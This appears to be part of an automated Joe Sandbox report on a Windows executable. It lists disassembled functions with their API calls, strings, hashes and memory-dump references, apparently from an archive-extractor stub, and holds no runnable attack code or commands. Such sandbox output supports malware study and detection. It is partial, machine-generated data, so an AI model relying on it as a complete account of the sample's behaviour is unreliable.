                          • Instruction ID: 06f0bca0f587961bb8acc0ccdba5179916208dc2332a5923212ec480ca0169a4
                          • Opcode Fuzzy Hash: 487e76caee72dca562d516c879af5ad784a7294596807fc164fd4771c6cbb6e0
                          • Instruction Fuzzy Hash: E6F04F31A18618BBDB17ABA5DC09BDEBFB9EF05715F054069F806A61A0DB348A40CB94
                          Function 0037EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00380085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003800A0
                            • Part of subcall function 00380085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0037EB86,Crypt32.dll,00000000,0037EC0A,?,?,0037EBEC,?,?,?), ref: 003800C2
                          • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0037EB92
                          • GetProcAddress.KERNEL32(003B81C0,CryptUnprotectMemory), ref: 0037EBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                          • API String ID: 2141747552-1753850145
                          • Opcode ID: 435fe291912ed0296365f7bce82b33490e0a4d8e136b9d922291967343b7866a
                          • Instruction ID: 549a04f829cf91a289fd57bcb21695071e90eb866901aa50e15fd3624e035b72
                          • Opcode Fuzzy Hash: 435fe291912ed0296365f7bce82b33490e0a4d8e136b9d922291967343b7866a
                          • Instruction Fuzzy Hash: DAE04F714047419ECB339F349849B82BEE49B1A700F01C85DF4D6D3150D7B4D5448B50
                          Function 00397DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: 2d6854a4b23e74687cc0bd0ba81f3d26460fe9a248ec2750db4958a7d09bc3da
                          • Instruction ID: db7335bfc5fb8671f7ed47763998fcf774b4d9e95e6a092d28ba22eedd4846ca
                          • Opcode Fuzzy Hash: 2d6854a4b23e74687cc0bd0ba81f3d26460fe9a248ec2750db4958a7d09bc3da
                          • Instruction Fuzzy Hash: 9F41B132E103049FDF26DF78C881A6EB7A5EF89714F1645A9E515EB291DB31ED01CB80
                          Function 0039B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 0039B619
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0039B63C
                            • Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0039B662
                          • _free.LIBCMT ref: 0039B675
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0039B684
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          • API String ID: 336800556-0
                          • Opcode ID: d804aa6ee0fa267e73e80b014b9a7a7e4aaab79bcd46212a62027733b45c00e7
                          • Instruction ID: 7225977a5eb9276f28c8d7d67b9926e23aabaef842591b451a0653b881147d31
                          • Opcode Fuzzy Hash: d804aa6ee0fa267e73e80b014b9a7a7e4aaab79bcd46212a62027733b45c00e7
                          • Instruction Fuzzy Hash: 06018472602315BFAB2316BA7D8CC7BAA6DDEC7BA03160229B904C7110DF60DD0191B0
                          Function 0038075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00380A41: ResetEvent.KERNEL32(?), ref: 00380A53
                            • Part of subcall function 00380A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00380A67
                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0038078F
                          • CloseHandle.KERNEL32(?,?), ref: 003807A9
                          • DeleteCriticalSection.KERNEL32(?), ref: 003807C2
                          • CloseHandle.KERNEL32(?), ref: 003807CE
                          • CloseHandle.KERNEL32(?), ref: 003807DA
                            • Part of subcall function 0038084E: WaitForSingleObject.KERNEL32(?,000000FF,00380A78,?), ref: 00380854
                            • Part of subcall function 0038084E: GetLastError.KERNEL32(?), ref: 00380860
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                          • String ID:
                          • API String ID: 1868215902-0
                          • Opcode ID: 1da5270f7356dbd97e1da3c87936f9352beb583275764d6aa43efe21aee3c378
                          • Instruction ID: e2666e9d54638a309784b7d39360800e3181227a4e6f3b38d0d8c0e376c2b023
                          • Opcode Fuzzy Hash: 1da5270f7356dbd97e1da3c87936f9352beb583275764d6aa43efe21aee3c378
                          • Instruction Fuzzy Hash: 62018071440B04EFC723EB65DC84B86FBADFB4A710F000559F15B42160CB756A488B90
                          Function 0039BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 0039BF28
                            • Part of subcall function 003984DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?), ref: 003984F4
                            • Part of subcall function 003984DE: GetLastError.KERNEL32(?,?,0039BFA7,?,00000000,?,00000000,?,0039BFCE,?,00000007,?,?,0039C3CB,?,?), ref: 00398506
                          • _free.LIBCMT ref: 0039BF3A
                          • _free.LIBCMT ref: 0039BF4C
                          • _free.LIBCMT ref: 0039BF5E
                          • _free.LIBCMT ref: 0039BF70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 8ffbadbb3db6ead6beed775684b808fc0a4441c670ad3536892437b8fc9de7db
                          • Instruction ID: 32ac70a5469e60a6c48e68d2c52c37c8d6e32cc5994e2e52878ffa1261566b80
                          • Opcode Fuzzy Hash: 8ffbadbb3db6ead6beed775684b808fc0a4441c670ad3536892437b8fc9de7db
                          • Instruction Fuzzy Hash: 76F0FF33508605ABCE22EB69FEC6C16B7DDBE41714B674819F049DB920CB20FC808A64
                          Function 003976BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\CRf9KBk4ra.exe,00000104), ref: 003976FD
                          • _free.LIBCMT ref: 003977C8
                          • _free.LIBCMT ref: 003977D2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\Desktop\CRf9KBk4ra.exe
                          • API String ID: 2506810119-2888744101
                          • Opcode ID: b7bfca850a3c607bd08c1fa593225a1f4f1dd146d798f3a584ef82ca4a7e9778
                          • Instruction ID: 6ce25e0318fe1a2586e7b904980fd64828681d7ce662f814e9f8a1c4ebaf737b
                          • Opcode Fuzzy Hash: b7bfca850a3c607bd08c1fa593225a1f4f1dd146d798f3a584ef82ca4a7e9778
                          • Instruction Fuzzy Hash: 11317C71A19218BFDF23DFD9EC819AEBBECEF85710F154066E8049B251D6708E40CBA0
                          Function 00377574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00377579
                            • Part of subcall function 00373B3D: __EH_prolog.LIBCMT ref: 00373B42
                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00377640
                            • Part of subcall function 00377BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00377C04
                            • Part of subcall function 00377BF5: GetLastError.KERNEL32 ref: 00377C4A
                            • Part of subcall function 00377BF5: CloseHandle.KERNEL32(?), ref: 00377C59
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                          • API String ID: 3813983858-639343689
                          • Opcode ID: 348656f142b8b5a20d853e1b9d110eb81853a60290f6fee5a2bd2b5b001b5148
                          • Instruction ID: 3c134619c9b8e0f901d697de4ffeebd2cf899212dace05b35fb2bf87559e063b
                          • Opcode Fuzzy Hash: 348656f142b8b5a20d853e1b9d110eb81853a60290f6fee5a2bd2b5b001b5148
                          • Instruction Fuzzy Hash: 9531E771A04248AEDF33EBA8DC41BEE7B7CAF15314F008159F549AB152C7788A44C7A1
                          Function 0038A430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                            • Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          • EndDialog.USER32(?,00000001), ref: 0038A4B8
                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0038A4CD
                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 0038A4E2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemText$DialogWindow
                          • String ID: ASKNEXTVOL
                          • API String ID: 445417207-3402441367
                          • Opcode ID: 373ee3a338e0bc6ed853f82b29d742c4cfb764c292933b00b56cd69dd0663ea0
                          • Instruction ID: 5b88bf3c41ae266e8c4e2b528fe0358f984b6f002dd2707b6ee412a5778eab32
                          • Opcode Fuzzy Hash: 373ee3a338e0bc6ed853f82b29d742c4cfb764c292933b00b56cd69dd0663ea0
                          • Instruction Fuzzy Hash: 5211B632245700AFEE23AFA9EC4DF6A77ADEB4A700F114047F2459B2A1C7A59911D722
                          Function 0037D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: __fprintf_l_strncpy
                          • String ID: $%s$@%s
                          • API String ID: 1857242416-834177443
                          • Opcode ID: 49040161f0250d0ca51a62a0b2bd2035525dda9224ad07d6290b8d9b95e9431d
                          • Instruction ID: e9a762f15326617b441407578e8b792961be56df63e59c9ecd471d7b6d0480b2
                          • Opcode Fuzzy Hash: 49040161f0250d0ca51a62a0b2bd2035525dda9224ad07d6290b8d9b95e9431d
                          • Instruction Fuzzy Hash: 8E218132440208AADF32DEA4CC06FEE7BBCEF05300F048916FA199A192D775DA56DB51
                          Function 0037B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • _swprintf.LIBCMT ref: 0037B51E
                            • Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D
                          • _wcschr.LIBVCRUNTIME ref: 0037B53C
                          • _wcschr.LIBVCRUNTIME ref: 0037B54C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _wcschr$__vswprintf_c_l_swprintf
                          • String ID: %c:\
                          • API String ID: 525462905-3142399695
                          • Opcode ID: 491d6fecdddb0d6a04db8f8aaa8ad87f7158bcc2cda7625e0321c18b3d4596bb
                          • Instruction ID: ce523d6902f44c361e50bc0b263aa145b7c4b60bbb9454d4eec35c244c65ecb0
                          • Opcode Fuzzy Hash: 491d6fecdddb0d6a04db8f8aaa8ad87f7158bcc2cda7625e0321c18b3d4596bb
                          • Instruction Fuzzy Hash: B601D653A04312BBCA336B659C46E6BE7BCDF97370751841AF849DA081EB38D950C2A1
                          Function 003806BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0037ABC5,00000008,?,00000000,?,0037CB88,?,00000000), ref: 003806F3
                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0037ABC5,00000008,?,00000000,?,0037CB88,?,00000000), ref: 003806FD
                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0037ABC5,00000008,?,00000000,?,0037CB88,?,00000000), ref: 0038070D
                          Strings
                          • Thread pool initialization failed., xrefs: 00380725
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                          • String ID: Thread pool initialization failed.
                          • API String ID: 3340455307-2182114853
                          • Opcode ID: ef9072be812af2c0453e51e81f667c234c0a669904edcfa53e4007262752c279
                          • Instruction ID: 18e2e0371b514fdae4b77aa5899c039f3d85b10ce39b0daea7cbde2d615c213e
                          • Opcode Fuzzy Hash: ef9072be812af2c0453e51e81f667c234c0a669904edcfa53e4007262752c279
                          • Instruction Fuzzy Hash: 0211C2B1600708AFC3326F75CC88AA7FBECEB95744F21482EF1DA87200D6716980CB60
                          Function 0038D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID: RENAMEDLG$REPLACEFILEDLG
                          • API String ID: 0-56093855
                          • Opcode ID: 1e809c588fb9ad2d45aeb3357dee6c013bd3fa0c27526cdf5993a9b0608f4aec
                          • Instruction ID: f6eba704132cc422f2df9b157a7e704c1ffa597cbddb1d4cf9730d66de6bad7e
                          • Opcode Fuzzy Hash: 1e809c588fb9ad2d45aeb3357dee6c013bd3fa0c27526cdf5993a9b0608f4aec
                          • Instruction Fuzzy Hash: 5E01B175600345AFCB13AF1AEC44E9A7BADE714388F004561F605D3270CAB1A850EBA1
                          Function 003991DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: __alldvrm$_strrchr
                          • String ID:
                          • API String ID: 1036877536-0
                          • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                          • Instruction ID: db8d74d3de0dfac497174beac127dbf9a9f350b38e0aa3f0c9d616ce7046d84c
                          • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                          • Instruction Fuzzy Hash: DBA16636A043869FEF23CF6DC8817AEBBE5EF55310F1945AFE4859B281C2348842C750
                          Function 0037A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,003780B7,?,?,?), ref: 0037A351
                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,003780B7,?,?), ref: 0037A395
                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,003780B7,?,?,?,?,?,?,?,?), ref: 0037A416
                          • CloseHandle.KERNEL32(?,?,00000000,?,003780B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0037A41D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: File$Create$CloseHandleTime
                          • String ID:
                          • API String ID: 2287278272-0
                          • Opcode ID: 5141544d01ba9cbaa7c0329ecce09ff9de797f8c4988858e5016adcde595877d
                          • Instruction ID: e86ab2e8a0c4ac2f54808ca9b3ad7b6c0436df16a1a043931aaef23439659094
                          • Opcode Fuzzy Hash: 5141544d01ba9cbaa7c0329ecce09ff9de797f8c4988858e5016adcde595877d
                          • Instruction Fuzzy Hash: B641DD30248780AAE732DF24CC45BAFBBE8ABC5700F04891CF5D9A7181D668DA48DB13
                          Function 0039C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003989AD,?,00000000,?,00000001,?,?,00000001,003989AD,?), ref: 0039C0E6
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0039C16F
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,003967E2,?), ref: 0039C181
                          • __freea.LIBCMT ref: 0039C18A
                            • Part of subcall function 00398518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0039C13D,00000000,?,003967E2,?,00000008,?,003989AD,?,?,?), ref: 0039854A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          • API String ID: 2652629310-0
